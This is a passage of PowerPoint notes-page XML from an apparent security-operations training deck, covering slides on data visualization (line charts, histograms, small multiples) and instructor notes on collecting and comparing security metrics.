                <a:spcPct val="0"/>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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good for explaining topologies</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9634" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E7543C2-E44C-E940-A875-F71720678585}"/>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87109596-1263-6948-BEAF-38C6EDDE0628}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B511C863-57A9-954C-9D99-8FDFEB2EB689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="695325"/>
            <a:ext cx="4572000"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9636" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31124509-BDF6-C44A-9A82-8296DC6255CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>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tIns="14224"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Periodic behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Trends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typically line-chart or histogram.</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1682" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B99FE67-43B9-9C4C-B899-5BDFE149487A}"/>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9B397278-45E2-5941-A1B3-2325E2FB7D3D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5DFC4E4-D0A7-C644-8AD2-E771591CEE77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="695325"/>
            <a:ext cx="4572000"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8066" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F94FB0-2655-CF4D-A43D-E2A78B5F9C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486400" cy="4114800"/>
          </a:xfrm>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tIns="17780"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>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endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Droid Sans Fallback" charset="0"/>
              <a:cs typeface="Droid Sans Fallback" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Easier to read than tables</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3730" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B77F3988-4846-CF4F-801A-2409FAC754C1}"/>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829F203C-7C05-824B-9DEF-56F6B037722C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCEA208D-5B7F-D14F-AFE1-B9B4ECCFCCB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="695325"/>
            <a:ext cx="4572000"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9090" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DF14B7F-365A-B74D-94FE-D4171097F828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486400" cy="4114800"/>
          </a:xfrm>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tIns="17780"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>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endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Droid Sans Fallback" charset="0"/>
              <a:cs typeface="Droid Sans Fallback" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good for understanding distributions and spotting anomalies.</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5778" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DAF6630-744A-2B44-8220-38EC7CF620A5}"/>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5FD92BE9-3E27-4F47-861F-79C05BFE07A0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40AA6AA5-FBA5-C94D-AB10-D8F432069A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="695325"/>
            <a:ext cx="4572000"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5780" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{892BC182-74B4-3445-A52D-F542F67740D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>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tIns="14224"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finding relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Identifying clusters of events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-330200" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204"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7826" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD863A20-19DA-B649-B966-8135547DB194}"/>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E0E74015-768F-D240-938A-92C199D84334}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72703E9E-DD8B-3A4F-9D2B-A001D670F6B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="695325"/>
            <a:ext cx="4572000"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7828" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{902C1E42-A6B7-8E4A-AC67-26933213D2B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>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tIns="17780"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>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sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:rPr>
              <a:t>“Small multiples”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>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sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:rPr>
              <a:t>High density of data visualization</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9874" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB93E45-8A5D-D748-A3A1-36D55AADB32B}"/>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2381422C-0173-EA41-BD89-6CDDB6672FC1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67189CE7-6BF4-204A-A654-0D587ADD30B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325438" y="4343400"/>
            <a:ext cx="6205537" cy="64484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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Metrics Collection Supports Operations: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> Metrics do not normally contain directly actionable information, but rather, expose the current and historical status of the security of your organization, the effectiveness of your operations, and security trends. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The screen shows a few of the questions metrics can answer. Of course, the next questions are: What is the significance of the metric? Does it imply you have more steps to take?</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Walk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> through the bullet points with learners.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="338"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>In an ideal world, the metrics collected in the security world would have already been standardized and therefore be easily shareable. Unfortunately that is not the case. Standardized metrics aid in comparisons between organizations, sectors, or countries, and yet there are no worldwide standards. But that doesn’t mean you should stop collecting and analyzing the metrics. It just means that sharing is more difficult. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> What do you think are the three key metrics your organization should collect?</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>This will allow your students to explore the range of metrics that can be collected. The particular metrics each students choose are not important; any are acceptable.</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1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The last aspect of Analysis we will research is meta-analysis and a reminder about source evaluation. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79876" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDCE25AB-A21F-A44E-986B-9E93193D5169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{A4DF16FC-95D5-4245-B877-78F02F8DBCA8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
